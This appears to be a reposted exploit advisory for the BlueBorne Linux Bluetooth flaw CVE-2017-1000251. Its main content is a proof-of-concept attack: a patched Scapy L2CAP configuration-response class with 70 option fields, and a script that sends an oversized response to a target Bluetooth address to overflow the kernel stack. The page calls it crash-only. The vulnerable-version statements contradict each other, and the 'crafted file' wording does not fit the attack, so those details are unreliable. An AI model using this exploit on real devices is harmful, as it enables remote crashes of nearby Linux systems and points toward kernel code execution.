BlueBorne Kernel version v3.3-rc1 Denial Of Service Vulnerability

Summary

The native Bluetooth stack in the Linux Kernel (BlueZ), starting at the Linux kernel version 3.3-rc1 and up to and including 4.13.1, are vulnerable to a stack overflow vulnerability in the processing of L2CAP configuration responses resulting in Remote code execution in kernel space.

Credit:

The information has been provided by Marcin Kozlowski .
The original article can be found at: https://gitlab.com/marcinguy/blueborne-CVE-2017-1000251


Details

Vulnerable Systems:
 * Kernel version v3.3-rc1 and Prior

The Vulnerability allows remote attackers to cause a denial of service via a crafted file.

Proof of Concept – Crash Only – Unarmed/Unweaponized/No Payload

After reading tons of Documentation and Protocol specifications.

1) Install Scapy

https://github.com/secdev/scapy

Add/Replace these requests and responses in Bluetooth Protocol stack to these:

scapy/layers/bluetooth.py

class L2CAP_ConfReq(Packet):
name = ‘L2CAP Conf Req’
fields_desc = [ LEShortField(‘dcid’,0),
LEShortField(‘flags’,0),
ByteField(‘type’,0),
ByteField(‘length’,0),
ByteField(‘identifier’,0),
ByteField(‘servicetype’,0),
LEShortField(‘sdusize’,0),
LEIntField(‘sduarrtime’,0),
LEIntField(‘accesslat’,0),
LEIntField(‘flushtime’,0),
]

class L2CAP_ConfResp(Packet):
name = ‘L2CAP Conf Resp’
fields_desc = [ LEShortField(‘scid’,0),
LEShortField(‘flags’,0),
LEShortField(‘result’,0),
ByteField(‘type0’,0),
ByteField(‘length0’,0),
LEShortField(‘option0’,0),
ByteField(‘type1’,0),
ByteField(‘length1’,0),
LEShortField(‘option1’,0),
ByteField(‘type2’,0),
ByteField(‘length2’,0),
LEShortField(‘option2’,0),
ByteField(‘type3’,0),
ByteField(‘length3’,0),
LEShortField(‘option3’,0),
ByteField(‘type4’,0),
ByteField(‘length4’,0),
LEShortField(‘option4’,0),
ByteField(‘type5’,0),
ByteField(‘length5’,0),
LEShortField(‘option5’,0),
ByteField(‘type6’,0),
ByteField(‘length6’,0),
LEShortField(‘option6’,0),
ByteField(‘type7’,0),
ByteField(‘length7’,0),
LEShortField(‘option7’,0),
ByteField(‘type8’,0),
ByteField(‘length8’,0),
LEShortField(‘option8’,0),
ByteField(‘type9’,0),
ByteField(‘length9’,0),
LEShortField(‘option9’,0),
ByteField(‘type10’,0),
ByteField(‘length10’,0),
LEShortField(‘option10’,0),
ByteField(‘type11’,0),
ByteField(‘length11’,0),
LEShortField(‘option11’,0),
ByteField(‘type12’,0),
ByteField(‘length12’,0),
LEShortField(‘option12’,0),
ByteField(‘type13’,0),
ByteField(‘length13’,0),
LEShortField(‘option13’,0),
ByteField(‘type14’,0),
ByteField(‘length14’,0),
LEShortField(‘option14’,0),
ByteField(‘type15’,0),
ByteField(‘length15’,0),
LEShortField(‘option15’,0),
ByteField(‘type16’,0),
ByteField(‘length16’,0),
LEShortField(‘option16’,0),
ByteField(‘type17’,0),
ByteField(‘length17’,0),
LEShortField(‘option17’,0),
ByteField(‘type18’,0),
ByteField(‘length18’,0),
LEShortField(‘option18’,0),
ByteField(‘type19’,0),
ByteField(‘length19’,0),
LEShortField(‘option19’,0),
ByteField(‘type20’,0),
ByteField(‘length20’,0),
LEShortField(‘option20’,0),
ByteField(‘type21’,0),
ByteField(‘length21’,0),
LEShortField(‘option21’,0),
ByteField(‘type22’,0),
ByteField(‘length22’,0),
LEShortField(‘option22’,0),
ByteField(‘type23’,0),
ByteField(‘length23’,0),
LEShortField(‘option23’,0),
ByteField(‘type24’,0),
ByteField(‘length24’,0),
LEShortField(‘option24’,0),
ByteField(‘type25’,0),
ByteField(‘length25’,0),
LEShortField(‘option25’,0),
ByteField(‘type26’,0),
ByteField(‘length26’,0),
LEShortField(‘option26’,0),
ByteField(‘type27’,0),
ByteField(‘length27’,0),
LEShortField(‘option27’,0),
ByteField(‘type28’,0),
ByteField(‘length28’,0),
LEShortField(‘option28’,0),
ByteField(‘type29’,0),
ByteField(‘length29’,0),
LEShortField(‘option29’,0),
ByteField(‘type30’,0),
ByteField(‘length30’,0),
LEShortField(‘option30’,0),
ByteField(‘type31’,0),
ByteField(‘length31’,0),
LEShortField(‘option31’,0),
ByteField(‘type32’,0),
ByteField(‘length32’,0),
LEShortField(‘option32’,0),
ByteField(‘type33’,0),
ByteField(‘length33’,0),
LEShortField(‘option33’,0),
ByteField(‘type34’,0),
ByteField(‘length34’,0),
LEShortField(‘option34’,0),
ByteField(‘type35’,0),
ByteField(‘length35’,0),
LEShortField(‘option35’,0),
ByteField(‘type36’,0),
ByteField(‘length36’,0),
LEShortField(‘option36’,0),
ByteField(‘type37’,0),
ByteField(‘length37’,0),
LEShortField(‘option37’,0),
ByteField(‘type38’,0),
ByteField(‘length38’,0),
LEShortField(‘option38’,0),
ByteField(‘type39’,0),
ByteField(‘length39’,0),
LEShortField(‘option39’,0),
ByteField(‘type40’,0),
ByteField(‘length40’,0),
LEShortField(‘option40’,0),
ByteField(‘type41’,0),
ByteField(‘length41’,0),
LEShortField(‘option41’,0),
ByteField(‘type42’,0),
ByteField(‘length42’,0),
LEShortField(‘option42’,0),
ByteField(‘type43’,0),
ByteField(‘length43’,0),
LEShortField(‘option43’,0),
ByteField(‘type44’,0),
ByteField(‘length44’,0),
LEShortField(‘option44’,0),
ByteField(‘type45’,0),
ByteField(‘length45’,0),
LEShortField(‘option45’,0),
ByteField(‘type46’,0),
ByteField(‘length46’,0),
LEShortField(‘option46’,0),
ByteField(‘type47’,0),
ByteField(‘length47’,0),
LEShortField(‘option47’,0),
ByteField(‘type48’,0),
ByteField(‘length48’,0),
LEShortField(‘option48’,0),
ByteField(‘type49’,0),
ByteField(‘length49’,0),
LEShortField(‘option49’,0),
ByteField(‘type50’,0),
ByteField(‘length50’,0),
LEShortField(‘option50’,0),
ByteField(‘type51’,0),
ByteField(‘length51’,0),
LEShortField(‘option51’,0),
ByteField(‘type52’,0),
ByteField(‘length52’,0),
LEShortField(‘option52’,0),
ByteField(‘type53’,0),
ByteField(‘length53’,0),
LEShortField(‘option53’,0),
ByteField(‘type54’,0),
ByteField(‘length54’,0),
LEShortField(‘option54’,0),
ByteField(‘type55’,0),
ByteField(‘length55’,0),
LEShortField(‘option55’,0),
ByteField(‘type56’,0),
ByteField(‘length56’,0),
LEShortField(‘option56’,0),
ByteField(‘type57’,0),
ByteField(‘length57’,0),
LEShortField(‘option57’,0),
ByteField(‘type58’,0),
ByteField(‘length58’,0),
LEShortField(‘option58’,0),
ByteField(‘type59’,0),
ByteField(‘length59’,0),
LEShortField(‘option59’,0),
ByteField(‘type60’,0),
ByteField(‘length60’,0),
LEShortField(‘option60’,0),
ByteField(‘type61’,0),
ByteField(‘length61’,0),
LEShortField(‘option61’,0),
ByteField(‘type62’,0),
ByteField(‘length62’,0),
LEShortField(‘option62’,0),
ByteField(‘type63’,0),
ByteField(‘length63’,0),
LEShortField(‘option63’,0),
ByteField(‘type64’,0),
ByteField(‘length64’,0),
LEShortField(‘option64’,0),
ByteField(‘type65’,0),
ByteField(‘length65’,0),
LEShortField(‘option65’,0),
ByteField(‘type66’,0),
ByteField(‘length66’,0),
LEShortField(‘option66’,0),
ByteField(‘type67’,0),
ByteField(‘length67’,0),
LEShortField(‘option67’,0),
ByteField(‘type68’,0),
ByteField(‘length68’,0),
LEShortField(‘option68’,0),
ByteField(‘type69’,0),
ByteField(‘length69’,0),
LEShortField(‘option69′,0),
]

2) Exploit

bluebornexploit.py
————————

from scapy.all import *

pkt = L2CAP_CmdHdr(code=4)/
L2CAP_ConfReq(type=0x06,length=16,identifier=1,servicetype=0x0,sdusize=0xffff,sduarrtime=0xffffffff,accesslat=0xffffffff,flushtime=0xffffffff)

pkt1 = L2CAP_CmdHdr(code=5)/
L2CAP_ConfResp(result=0x04,type0=1,length0=2,option0=2000,type1=1,length1=2,option1=2000,type2=1,length2=2,option2=2000,type3=1,length3=2,option3=2000,type4=1,length4=2,option4=2000,type5=1,length5=2,option5=2000,type6=1,length6=2,option6=2000,type7=1,length7=2,option7=2000,type8=1,length8=2,option8=2000,type9=1,length9=2,option9=2000,type10=1,length10=2,option10=2000,type11=1,length11=2,option11=2000,type12=1,length12=2,option12=2000,type13=1,length13=2,option13=2000,type14=1,length14=2,option14=2000,type15=1,length15=2,option15=2000,type16=1,length16=2,option16=2000,type17=1,length17=2,option17=2000,type18=1,length18=2,option18=2000,type19=1,length19=2,option19=2000,type20=1,length20=2,option20=2000,type21=1,length21=2,option21=2000,type22=1,length22=2,option22=2000,type23=1,length23=2,option23=2000,type24=1,length24=2,option24=2000,type25=1,length25=2,option25=2000,type26=1,length26=2,option26=2000,type27=1,length27=2,option27=2000,type28=1,length28=2,option28=2000,type29=1,length29=2,option29=2000,type30=1,length30=2,option30=2000,type31=1,length31=2,option31=2000,type32=1,length32=2,option32=2000,type33=1,length33=2,option33=2000,type34=1,length34=2,option34=2000,type35=1,length35=2,option35=2000,type36=1,length36=2,option36=2000,type37=1,length37=2,option37=2000,type38=1,length38=2,option38=2000,type39=1,length39=2,option39=2000,type40=1,length40=2,option40=2000,type41=1,length41=2,option41=2000,type42=1,length42=2,option42=2000,type43=1,length43=2,option43=2000,type44=1,length44=2,option44=2000,type45=1,length45=2,option45=2000,type46=1,length46=2,option46=2000,type47=1,length47=2,option47=2000,type48=1,length48=2,option48=2000,type49=1,length49=2,option49=2000,type50=1,length50=2,option50=2000,type51=1,length51=2,option51=2000,type52=1,length52=2,option52=2000,type53=1,length53=2,option53=2000,type54=1,length54=2,option54=2000,type55=1,length55=2,option55=2000,type56=1,length56=2,option56=2000,type57=1,length57=2,option57=2000,type58=1,length58=2,option58=2000,type59=1,length59=2,option59=2000,type60=1,length60=2,option60=2000,type61=1,length61=2,option61=2000,type62=1,length62=2,option62=2000,type63=1,length63=2,option63=2000,type64=1,length64=2,option64=2000,type65=1,length65=2,option65=2000,type66=1,length66=2,option66=2000,type67=1,length67=2,option67=2000,type68=1,length68=2,option68=2000,type69=1,length69=2,option69=2000)

bt = BluetoothL2CAPSocket(’00:1A:7D:DA:71:13′)

bt.send(pkt)
bt.send(pkt1)

bluetoothsrv.py
——————–

from scapy.all import *

bt = BluetoothL2CAPSocket(’01:02:03:04:05:06’)

bt.recv()

CVE Information:
CVE-2017-1000251

Disclosure Timeline:
Publish Date: 09/21/2017

Categories: Exploits